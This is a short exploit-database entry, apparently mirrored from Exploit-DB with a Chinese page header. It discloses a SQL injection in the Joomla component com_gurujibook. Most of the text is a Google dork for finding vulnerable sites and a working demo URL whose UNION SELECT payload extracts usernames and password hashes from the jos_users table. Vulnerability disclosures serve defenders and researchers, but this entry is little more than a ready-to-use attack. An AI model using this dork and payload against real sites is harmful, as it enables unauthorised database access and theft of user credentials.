Joomla! Component com_gurujibook – SQL Injection

  • 作者: snakespc
    日期: 2010-01-22
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/11225/
  • #--------------------------------------------------------
#Joomla (com_gurujibook) SQL injection Vulnerability
#--------------------------------------------------------
#Discovered By: Snakespc ALGERIAN HaCkEr 
#Mail: snakespc@gmail.com 
#site:anti-sec.info/vb/index.php
#-------------------------------------------------------
#Dork:inurl"com_gurujibook"
#Exploit:
#--------
#Demo:
#http://server/index.php?option=com_gurujibook&task=showPDF&bookid=-32+union+all+select+concat(username,0x3a,password),2,3,4+from+jos_users--
    Python